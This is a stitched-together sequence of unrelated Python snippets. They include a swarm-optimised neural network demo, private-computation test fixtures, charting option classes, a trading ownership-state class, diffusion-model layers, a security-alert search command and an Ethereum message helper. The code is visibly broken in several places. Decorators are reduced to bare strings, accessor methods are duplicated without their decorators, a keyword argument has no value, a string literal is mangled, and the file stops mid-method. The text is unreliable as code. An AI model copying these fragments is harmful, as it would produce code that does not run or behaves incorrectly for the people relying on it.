model = ParticleSwarmOptimizedNN(population_size=population_size, inertia_weight=inertia_weight, cognitive_weight=cognitive_weight, social_weight=social_weight, max_velocity=5, model_builder=model_builder)
model = model.evolve(X_train, y_train, n_generations=n_generations)
(loss, accuracy) = model.test_on_batch(X_test, y_test)
print(('Accuracy: %.1f%%' % float((100 * accuracy))))
y_pred = np.argmax(model.predict(X_test), axis=1)
Plot().plot_in_2d(X_test, y_pred, title='Particle Swarm Optimized Neural Network', accuracy=accuracy, legend_labels=range(y.shape[1])) |
def gen_dummy_pc_instance() -> PrivateComputationInstance:
infra_config: InfraConfig = InfraConfig(instance_id='pc_instance_id', role=PrivateComputationRole.PUBLISHER, status=PrivateComputationInstanceStatus.POST_PROCESSING_HANDLERS_COMPLETED, status_update_ts=int(time.time()), instances=[gen_dummy_stage_state_instance(), gen_dummy_post_processing_instance()], game_type=PrivateComputationGameType.LIFT, pce_config=PCEConfig(subnets=['subnet'], cluster='onedocker-cluster-name', region='us-west-2', onedocker_task_definition='arn:aws:ecs:us-west-2::task/cluster-name/subnet'), _stage_flow_cls_name='PrivateComputationStageFlow', retry_counter=0, num_pid_containers=1, num_mpc_containers=1, num_files_per_mpc_container=40, mpc_compute_concurrency=4, status_updates=[])
common: CommonProductConfig = CommonProductConfig(input_path=' output_dir=' hmac_key='', padding_size=25)
product_config: ProductConfig = LiftConfig(common=common, k_anonymity_threshold=100, breakdown_key=BreakdownKey.get_default_key())
return PrivateComputationInstance(infra_config=infra_config, product_config=product_config) |
class OptionSeriesWordcloudOnpoint(Options):
def connectorOptions(self) -> 'OptionSeriesWordcloudOnpointConnectoroptions':
return self._config_sub_data('connectorOptions', OptionSeriesWordcloudOnpointConnectoroptions)
def id(self):
return self._config_get(None)
def id(self, text: str):
self._config(text, js_type=False)
def position(self) -> 'OptionSeriesWordcloudOnpointPosition':
return self._config_sub_data('position', OptionSeriesWordcloudOnpointPosition) |
class OptionSeriesStreamgraphMarkerStatesSelect(Options):
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def fillColor(self):
return self._config_get('#cccccc')
def fillColor(self, text: str):
self._config(text, js_type=False)
def lineColor(self):
return self._config_get('#000000')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(2)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(None)
def radius(self, num: float):
self._config(num, js_type=False) |
class OwnershipState(BaseOwnershipState):
__slots__ = ('_amount_by_currency_id', '_quantities_by_good_id')
def __init__(self) -> None:
self._amount_by_currency_id = None
self._quantities_by_good_id = None
def set(self, amount_by_currency_id: CurrencyHoldings=None, quantities_by_good_id: GoodHoldings=None, **kwargs: Any) -> None:
if (amount_by_currency_id is None):
raise ValueError('Must provide amount_by_currency_id.')
if (quantities_by_good_id is None):
raise ValueError('Must provide quantities_by_good_id.')
enforce((not self.is_initialized), 'Cannot apply state update, current state is already initialized!')
self._amount_by_currency_id = copy.copy(amount_by_currency_id)
self._quantities_by_good_id = copy.copy(quantities_by_good_id)
def apply_delta(self, delta_amount_by_currency_id: Dict[(str, int)]=None, delta_quantities_by_good_id: Dict[(str, int)]=None, **kwargs: Any) -> None:
if (delta_amount_by_currency_id is None):
raise ValueError('Must provide delta_amount_by_currency_id.')
if (delta_quantities_by_good_id is None):
raise ValueError('Must provide delta_quantities_by_good_id.')
if ((self._amount_by_currency_id is None) or (self._quantities_by_good_id is None)):
raise ValueError('Cannot apply state update, current state is not initialized!')
enforce(all(((key in self._amount_by_currency_id) for key in delta_amount_by_currency_id.keys())), 'Invalid keys present in delta_amount_by_currency_id.')
enforce(all(((key in self._quantities_by_good_id) for key in delta_quantities_by_good_id.keys())), 'Invalid keys present in delta_quantities_by_good_id.')
for (currency_id, amount_delta) in delta_amount_by_currency_id.items():
self._amount_by_currency_id[currency_id] += amount_delta
for (good_id, quantity_delta) in delta_quantities_by_good_id.items():
self._quantities_by_good_id[good_id] += quantity_delta
def is_initialized(self) -> bool:
return ((self._amount_by_currency_id is not None) and (self._quantities_by_good_id is not None))
def amount_by_currency_id(self) -> CurrencyHoldings:
if (self._amount_by_currency_id is None):
raise ValueError('amount_by_currency_id is not set!')
return copy.copy(self._amount_by_currency_id)
def quantities_by_good_id(self) -> GoodHoldings:
if (self._quantities_by_good_id is None):
raise ValueError('quantities_by_good_id is not set!')
return copy.copy(self._quantities_by_good_id)
def is_affordable_transaction(self, terms: Terms) -> bool:
if (all(((amount == 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity == 0) for quantity in terms.quantities_by_good_id.values()))):
result = False
elif (all(((amount <= 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity >= 0) for quantity in terms.quantities_by_good_id.values()))):
result = all(((self.amount_by_currency_id[currency_id] >= (- amount)) for (currency_id, amount) in terms.amount_by_currency_id.items()))
elif (all(((amount >= 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity <= 0) for quantity in terms.quantities_by_good_id.values()))):
result = all(((self.quantities_by_good_id[good_id] >= (- quantity)) for (good_id, quantity) in terms.quantities_by_good_id.items()))
else:
result = False
return result
def is_affordable(self, terms: Terms) -> bool:
if self.is_initialized:
is_affordable = self.is_affordable_transaction(terms)
else:
_default_logger.debug('Cannot verify whether transaction is affordable as ownership state is not initialized. Assuming it is!')
is_affordable = True
return is_affordable
def update(self, terms: Terms) -> None:
if ((self._amount_by_currency_id is None) or (self._quantities_by_good_id is None)):
raise ValueError('Cannot apply state update, current state is not initialized!')
for (currency_id, amount_delta) in terms.amount_by_currency_id.items():
self._amount_by_currency_id[currency_id] += amount_delta
for (good_id, quantity_delta) in terms.quantities_by_good_id.items():
self._quantities_by_good_id[good_id] += quantity_delta
def apply_transactions(self, list_of_terms: List[Terms]) -> 'OwnershipState':
new_state = copy.copy(self)
for terms in list_of_terms:
new_state.update(terms)
return new_state
def __copy__(self) -> 'OwnershipState':
state = OwnershipState()
if self.is_initialized:
state._amount_by_currency_id = self.amount_by_currency_id
state._quantities_by_good_id = self.quantities_by_good_id
return state |
class DownBlocks(fl.Chain):
def __init__(self, in_channels: int, device: ((Device | str) | None)=None, dtype: (DType | None)=None):
self.in_channels = in_channels
super().__init__(fl.Chain(fl.Conv2d(in_channels=in_channels, out_channels=320, kernel_size=3, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype), CLIPLCrossAttention(channels=320, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype), CLIPLCrossAttention(channels=320, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=320, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=640, device=device, dtype=dtype), CLIPLCrossAttention(channels=640, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=640, device=device, dtype=dtype), CLIPLCrossAttention(channels=640, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=640, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=1280, device=device, dtype=dtype), CLIPLCrossAttention(channels=1280, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype), CLIPLCrossAttention(channels=1280, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=1280, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype))) |
def _shape_to_str(shapes: List[Union[(IntVar, Tensor)]], intimm_to_int=False):
shape_str = '['
for (idx, shape) in enumerate(shapes):
if (idx != 0):
shape_str += ', '
if isinstance(shape, IntImm):
if intimm_to_int:
shape_str += f'{shape.value()}'
else:
shape_str += f'IntImm({shape.value()})'
elif isinstance(shape, IntVar):
shape_str += f"IntVar({shape._attrs['values']}, name='{shape._attrs['name']}')"
elif isinstance(shape, Tensor):
raise RuntimeError('IntVarTensor not supported yet')
shape_str += ']'
return shape_str |
def dfs(root_path: str) -> List[str]:
ret = []
for (root, _, files) in os.walk(root_path, topdown=False):
for name in files:
path = os.path.join(root, name)
if path.endswith('.py'):
with open(path) as fi:
src = fi.read()
flag = True
for line in HEADER_lines:
if (line not in src):
flag = False
break
if (not flag):
ret.append(path)
return ret |
def sync_tree(root, dest, concurrency=1, disable_progress=False, recursive=False, dont_checkout=False, dont_store_token=False):
if (not disable_progress):
progress.init_progress(len(root.leaves))
actions = get_git_actions(root, dest, recursive, dont_checkout, dont_store_token)
with concurrent.futures.ThreadPoolExecutor(max_workers=concurrency) as executor:
executor.map(clone_or_pull_project, actions)
elapsed = progress.finish_progress()
log.debug('Syncing projects took [%s]', elapsed) |
class TestPIDRunProtocolStageService(IsolatedAsyncioTestCase):
('fbpcp.service.storage.StorageService')
('fbpcp.service.onedocker.OneDockerService')
def setUp(self, mock_onedocker_service, mock_storage_service) -> None:
self.mock_onedocker_svc = mock_onedocker_service
self.mock_storage_svc = mock_storage_service
self.test_num_containers = 1
self.onedocker_binary_config_map = defaultdict((lambda : OneDockerBinaryConfig(tmp_directory='/test_tmp_directory/', binary_version='latest', repository_path='test_path/')))
self.server_ips = [f'192.0.2.{i}' for i in range(self.test_num_containers)]
self.input_path = 'in'
self.output_path = 'out'
self.pc_instance_id = 'test_instance_123'
self.port = 15200
self.use_row_numbers = True
self.container_permission_id = 'test-container-permission'
async def test_pid_run_protocol_stage(self) -> None:
async def _run_sub_test(pc_role: PrivateComputationRole, multikey_enabled: bool, run_id: Optional[str]=None) -> None:
pid_protocol = (PIDProtocol.UNION_PID_MULTIKEY if ((self.test_num_containers == 1) and multikey_enabled) else PIDProtocol.UNION_PID)
use_row_number = pid_should_use_row_numbers(self.use_row_numbers, pid_protocol)
pc_instance = self.create_sample_pc_instance(pc_role, pid_use_row_numbers=use_row_number, pid_protocol=pid_protocol, multikey_enabled=multikey_enabled, run_id=run_id)
stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
updated_pc_instance = (await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='', ca_certificate_path='', server_ips=self.server_ips))
binary_name = PIDRunProtocolBinaryService.get_binary_name(pid_protocol, pc_role)
binary_config = self.onedocker_binary_config_map[binary_name]
env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info')
args_str_expect = self.get_args_expect(pc_role, pid_protocol, self.use_row_numbers, run_id)
self.mock_onedocker_svc.start_containers.assert_called_with(package_name=binary_name, version=binary_config.binary_version, cmd_args_list=args_str_expect, timeout=DEFAULT_CONTAINER_TIMEOUT_IN_SEC, env_vars=env_vars, container_type=None, certificate_request=None, opa_workflow_path=None, permission=ContainerPermissionConfig(self.container_permission_id))
self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers)
stage_state_actual = updated_pc_instance.infra_config.instances[0]
self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')
data_tests = itertools.product([PrivateComputationRole.PUBLISHER, PrivateComputationRole.PARTNER], [True, False], [None, '2621fda2-0eca-11ed-861d-0242ac120002'])
for (pc_role, multikey_enabled, test_run_id) in data_tests:
with self.subTest(pc_role=pc_role, multikey_enabled=multikey_enabled, test_run_id=test_run_id):
(await _run_sub_test(pc_role=pc_role, multikey_enabled=multikey_enabled, run_id=test_run_id))
async def test_pid_run_protocol_stage_tls_enabled_publisher(self) -> None:
pc_role = PrivateComputationRole.PUBLISHER
pc_instance = self.create_sample_pc_instance(pc_role, server_domain='test_domain')
stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
server_hostnames = gen_tls_server_hostnames_for_publisher(pc_instance.infra_config.server_domain, pc_role, self.test_num_containers)
stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers, server_uris=server_hostnames)
updated_pc_instance = (await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='', ca_certificate_path=''))
self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
stage_state_actual = updated_pc_instance.infra_config.instances[0]
self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')
async def test_pid_run_protocol_stage_with_tls(self) -> None:
async def _run_sub_test(pc_role: PrivateComputationRole, multikey_enabled: bool, run_id: Optional[str]=None) -> None:
pid_protocol = (PIDProtocol.UNION_PID_MULTIKEY if ((self.test_num_containers == 1) and multikey_enabled) else PIDProtocol.UNION_PID)
use_row_number = pid_should_use_row_numbers(self.use_row_numbers, pid_protocol)
pc_instance = self.create_sample_pc_instance(pc_role, pid_use_row_numbers=use_row_number, pid_protocol=pid_protocol, multikey_enabled=multikey_enabled, run_id=run_id, use_tls=True)
stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
updated_pc_instance = (await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='tls/server_certificate.pem', ca_certificate_path='tls/ca_certificate.pem', server_ips=self.server_ips, server_hostnames=(['node0.meta.com'] if (pc_role is PrivateComputationRole.PARTNER) else None)))
binary_name = PIDRunProtocolBinaryService.get_binary_name(pid_protocol, pc_role)
binary_config = self.onedocker_binary_config_map[binary_name]
if (pc_role is PrivateComputationRole.PUBLISHER):
expected_env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info')
else:
expected_env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info', SERVER_HOSTNAME='node0.meta.com', IP_ADDRESS='192.0.2.0')
args_str_expect = self.get_args_expect(pc_role, pid_protocol, self.use_row_numbers, run_id, use_tls=True)
self.mock_onedocker_svc.start_containers.assert_called_with(package_name=binary_name, version=binary_config.binary_version, cmd_args_list=args_str_expect, timeout=DEFAULT_CONTAINER_TIMEOUT_IN_SEC, env_vars=[expected_env_vars], container_type=None, certificate_request=None, opa_workflow_path=TLS_OPA_WORKFLOW_PATH, permission=ContainerPermissionConfig(self.container_permission_id))
self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers)
stage_state_actual = updated_pc_instance.infra_config.instances[0]
self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')
data_tests = itertools.product([PrivateComputationRole.PUBLISHER, PrivateComputationRole.PARTNER], [True, False], [None, '2621fda2-0eca-11ed-861d-0242ac120002'])
for (pc_role, multikey_enabled, test_run_id) in data_tests:
with self.subTest(pc_role=pc_role, multikey_enabled=multikey_enabled, test_run_id=test_run_id):
(await _run_sub_test(pc_role=pc_role, multikey_enabled=multikey_enabled, run_id=test_run_id))
def create_sample_pc_instance(self, pc_role: PrivateComputationRole=PrivateComputationRole.PARTNER, status: PrivateComputationInstanceStatus=PrivateComputationInstanceStatus.PID_PREPARE_COMPLETED, multikey_enabled: bool=False, pid_use_row_numbers: bool=True, pid_protocol: PIDProtocol=DEFAULT_PID_PROTOCOL, run_id: Optional[str]=None, server_domain: Optional[str]=None, use_tls: Optional[bool]=False) -> PrivateComputationInstance:
infra_config: InfraConfig = InfraConfig(instance_id=self.pc_instance_id, role=pc_role, status=status, status_update_ts=, instances=[], game_type=PrivateComputationGameType.LIFT, num_pid_containers=self.test_num_containers, num_mpc_containers=self.test_num_containers, num_files_per_mpc_container=self.test_num_containers, status_updates=[], run_id=run_id, server_domain=server_domain, pcs_features=(set() if (not use_tls) else {PCSFeature.PCF_TLS}), container_permission_id=self.container_permission_id)
common: CommonProductConfig = CommonProductConfig(input_path=self.input_path, output_dir=self.output_path, pid_use_row_numbers=pid_use_row_numbers, multikey_enabled=multikey_enabled, pid_protocol=pid_protocol)
product_config: ProductConfig = LiftConfig(common=common)
return PrivateComputationInstance(infra_config=infra_config, product_config=product_config)
def create_container_instance(self, id: int, container_status: ContainerInstanceStatus=ContainerInstanceStatus.COMPLETED) -> ContainerInstance:
return ContainerInstance(instance_id=f'test_container_instance_{id}', ip_address=f'127.0.0.{id}', status=container_status)
def get_args_expect(self, pc_role: PrivateComputationRole, protocol: PIDProtocol, use_row_numbers: bool, test_run_id: Optional[str]=None, use_tls: Optional[bool]=False) -> List[str]:
arg_ls = []
if ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID) and (not use_tls)):
arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --no-tls --use-row-numbers')
elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID) and use_tls):
arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --use-row-numbers --tls-cert tls/server_certificate.pem --tls-key tls/private_key.pem')
elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and (not use_tls)):
arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --no-tls')
elif ((pc_role is PrivateComputationRole.PUBLISHER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and use_tls):
arg_ls.append('--host 0.0.0.0:15200 --input out/test_instance_123_out_dir/pid_stage/out.csv_publisher_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0 --metric-path out/test_instance_123_out_dir/pid_stage/out.csv_publisher_pid_matched_0_metrics --tls-cert tls/server_certificate.pem --tls-key tls/private_key.pem')
elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID) and (not use_tls)):
arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --no-tls --use-row-numbers')
elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID) and use_tls):
arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --use-row-numbers --tls-ca tls/ca_certificate.pem')
elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and (not use_tls)):
arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --no-tls')
elif ((pc_role is PrivateComputationRole.PARTNER) and (protocol is PIDProtocol.UNION_PID_MULTIKEY) and use_tls):
arg_ls.append('--company --input out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_prepared_0 --output out/test_instance_123_out_dir/pid_stage/out.csv_advertiser_pid_matched_0 --tls-ca tls/ca_certificate.pem')
modified_arg_ls = []
for arg in arg_ls:
modified_arg = arg
if (test_run_id is not None):
modified_arg = ' '.join([arg, f'--run_id {test_run_id}'])
else:
modified_arg = arg
modified_arg_ls.append(modified_arg)
return modified_arg_ls
return arg_ls |
_group.command('search-alerts')
('query', required=False)
('--date-range', '-d', type=(str, str), default=('now-7d', 'now'), help='Date range to scope search')
('--columns', '-c', multiple=True, help='Columns to display in table')
('--extend', '-e', is_flag=True, help='If columns are specified, extend the original columns')
('--max-count', '-m', default=100, help='The max number of alerts to return')
_context
def search_alerts(ctx, query, date_range, columns, extend, max_count):
from eql.table import Table
from .eswrap import MATCH_ALL, add_range_to_dsl
kibana = ctx.obj['kibana']
(start_time, end_time) = date_range
kql_query = (kql.to_dsl(query) if query else MATCH_ALL)
add_range_to_dsl(kql_query['bool'].setdefault('filter', []), start_time, end_time)
with kibana:
alerts = [a['_source'] for a in Signal.search({'query': kql_query}, size=max_count)['hits']['hits']]
if alerts:
table_columns = ['host.hostname']
if ('signal' in alerts[0]):
table_columns += ['signal.rule.name', 'signal.status', 'signal.original_time']
elif ('kibana.alert.rule.name' in alerts[0]):
table_columns += ['kibana.alert.rule.name', 'kibana.alert.status', 'kibana.alert.original_time']
else:
table_columns += ['rule.name', '']
if columns:
columns = list(columns)
table_columns = ((table_columns + columns) if extend else columns)
for alert in alerts:
for key in table_columns:
if (key in alert):
nested_set(alert, key, alert[key])
click.echo(Table.from_list(table_columns, alerts))
else:
click.echo('No alerts detected')
return alerts |
class ClassDocumenter(autodoc.ClassDocumenter):
def import_object(self, raiseerror: bool=False) -> bool:
ret = super().import_object(raiseerror)
if isinstance(self.object, dsl.Schema.__class__):
self.object = self.object.__class__
self.doc_as_attr = False
return ret
def get_attr(self, obj: typing.Any, name: str, *defargs: typing.Any) -> typing.Any:
if ((obj is provider.Meta) and (name == '__call__')):
return None
return super().get_attr(obj, name, *defargs) |
def get_required_data_to_create_purchase_record(order, center, error_logs):
data = []
if ((not frappe.db.exists('Purchase Invoice', {'zenoti_order_no': order['order_number']})) and (not frappe.db.exists('Purchase Order', {'zenoti_order_no': order['order_number']}))):
cost_center = center.get('erpnext_cost_center')
if (not cost_center):
err_msg = _('Center {0} is not linked to any ERPNext Cost Center.').format(frappe.bold(center.get('center_name')))
msg = ((_('For Order no {}.').format(order['order_number']) + ' ') + err_msg)
error_logs.append(msg)
(item_data, item_err_msg_list) = process_purchase_partials(order.get('partials'), cost_center)
if len(item_err_msg_list):
item_err_msg = '\n'.join((err for err in item_err_msg_list))
msg = ((_('For Order no {}.').format(order['order_number']) + '\n') + item_err_msg)
error_logs.append(msg)
if (not len(item_err_msg_list)):
date_time = order['ordered_date'].split('T')
data_dict = {'supplier': order['vendor']['code'], 'date': date_time[0], 'time': date_time[1], 'order_number': order['order_number'], 'status': order['status'], 'item_data': item_data, 'is_return': item_data[0]['is_return'], 'cost_center': cost_center}
data.append(data_dict)
return data |
class OptionPlotoptionsColumnpyramidSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def find_closest_segment(segs, target_length):
closest_length = float('inf')
closest_seg = None
for seg in segs:
length_difference = abs((len(seg) - target_length))
if (length_difference < closest_length):
closest_length = length_difference
closest_seg = seg
return closest_seg |
class RichTextFormField(forms.fields.CharField):
def __init__(self, *args, **kwargs):
self.cleanse = kwargs.pop('cleanse', None)
super().__init__(*args, **kwargs)
css_class = self.widget.attrs.get('class', '')
css_class += ' item-richtext'
self.widget.attrs['class'] = css_class
def clean(self, value):
value = super().clean(value)
if self.cleanse:
value = self.cleanse(value)
return value |
class MissingTranslationHandler(ResponseHandler):
def applies_to(api, response):
return ('translations/missing.json' in get_endpoint_path(api, response))
def build(self, response):
return self.deserialize(response.json())
def deserialize(self, response_json):
return response_json['locales'] |
class SkipBuildCache():
def __init__(self, context_skip_cache_flag: bool=True):
self.context_skip_cache_flag = context_skip_cache_flag
def __enter__(self):
global skip_cache_flag
self.old_skip_cache_flag = skip_cache_flag
skip_cache_flag = self.context_skip_cache_flag
def __exit__(self, *args, **kwargs):
global skip_cache_flag
skip_cache_flag = self.old_skip_cache_flag |
def test_nan_encoding_for_new_categories_if_unseen_is_ignore():
df_fit = pd.DataFrame({'col1': ['a', 'a', 'b', 'a', 'c'], 'col2': ['1', '2', '3', '1', '2']})
df_transf = pd.DataFrame({'col1': ['a', 'd', 'b', 'a', 'c'], 'col2': ['1', '2', '3', '1', '4']})
encoder = CountFrequencyEncoder(unseen='ignore').fit(df_fit)
result = encoder.transform(df_transf)
assert (pd.isnull(result).sum().sum() == 2)
expected_result = pd.DataFrame({'col1': [3, nan, 1, 3, 1], 'col2': [2, 2, 1, 2, nan]})
pd.testing.assert_frame_equal(result, expected_result) |
def set_nested_key(dict_: dict, keys: list, key: Any, value: Any):
new_dict = dict_
for k in keys:
if (not (k in new_dict)):
new_dict[k] = {}
if isinstance(new_dict[k], dict):
new_dict = new_dict[k]
else:
raise ValueError()
new_dict[key] = value |
class OptionPlotoptionsSankeySonification(Options):
def contextTracks(self) -> 'OptionPlotoptionsSankeySonificationContexttracks':
return self._config_sub_data('contextTracks', OptionPlotoptionsSankeySonificationContexttracks)
def defaultInstrumentOptions(self) -> 'OptionPlotoptionsSankeySonificationDefaultinstrumentoptions':
return self._config_sub_data('defaultInstrumentOptions', OptionPlotoptionsSankeySonificationDefaultinstrumentoptions)
def defaultSpeechOptions(self) -> 'OptionPlotoptionsSankeySonificationDefaultspeechoptions':
return self._config_sub_data('defaultSpeechOptions', OptionPlotoptionsSankeySonificationDefaultspeechoptions)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def pointGrouping(self) -> 'OptionPlotoptionsSankeySonificationPointgrouping':
return self._config_sub_data('pointGrouping', OptionPlotoptionsSankeySonificationPointgrouping)
def tracks(self) -> 'OptionPlotoptionsSankeySonificationTracks':
return self._config_sub_data('tracks', OptionPlotoptionsSankeySonificationTracks) |
def prepare_message(caller: Address, target: Union[(Bytes0, Address)], value: U256, data: Bytes, gas: Uint, env: Environment, code_address: Optional[Address]=None, should_transfer_value: bool=True, is_static: bool=False) -> Message:
if isinstance(target, Bytes0):
current_target = compute_contract_address(caller, (get_account(env.state, caller).nonce - U256(1)))
msg_data = Bytes(b'')
code = data
elif isinstance(target, Address):
current_target = target
msg_data = data
code = get_account(env.state, target).code
if (code_address is None):
code_address = target
else:
raise AssertionError('Target must be address or empty bytes')
return Message(caller=caller, target=target, gas=gas, value=value, data=msg_data, code=code, depth=Uint(0), current_target=current_target, code_address=code_address, should_transfer_value=should_transfer_value, is_static=is_static, parent_evm=None) |
def apk_parse_release_filename(apkname):
m = apk_release_filename_with_sigfp.match(apkname)
if m:
return (m.group('appid'), int(m.group('vercode')), m.group('sigfp'))
m = apk_release_filename.match(apkname)
if m:
return (m.group('appid'), int(m.group('vercode')), None)
return (None, None, None) |
def _generate_apidocs_default_packages() -> None:
for (component_type, default_package) in DEFAULT_PACKAGES:
public_id = PublicId.from_str(default_package)
author = public_id.author
name = public_id.name
type_plural = component_type.to_plural()
package_dir = (((PACKAGES_DIR / author) / type_plural) / name)
for module_path in package_dir.rglob('*.py'):
print(f'Processing {module_path}...', end='')
if should_skip(module_path):
continue
suffix = Path((str(module_path.relative_to(package_dir))[:(- 3)] + '.md'))
dotted_path = '.'.join(module_path.parts)[:(- 3)]
doc_file = (((API_DIR / type_plural) / name) / suffix)
make_pydoc(dotted_path, doc_file) |
def _parse_sitemap(root):
d = dict()
for node in root:
for n in node:
if ('loc' in n.tag):
d[n.text] = {}
def parse_xml_node(node, node_url, prefix=''):
nonlocal d
keys = []
for element in node:
if element.text:
tag = element.tag.split('}')[(- 1)]
d[node_url][(prefix + tag)] = element.text
keys.append(tag)
prefix = (prefix if (tag in keys) else '')
if list(element):
parse_xml_node(element, node_url, prefix=(element.tag.split('}')[(- 1)] + '_'))
for node in root:
node_url = [n.text for n in node if ('loc' in n.tag)][0]
parse_xml_node(node, node_url=node_url)
return pd.DataFrame(d.values()) |
class OptionSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def value(self):
return self._config_get(None)
def value(self, num: float):
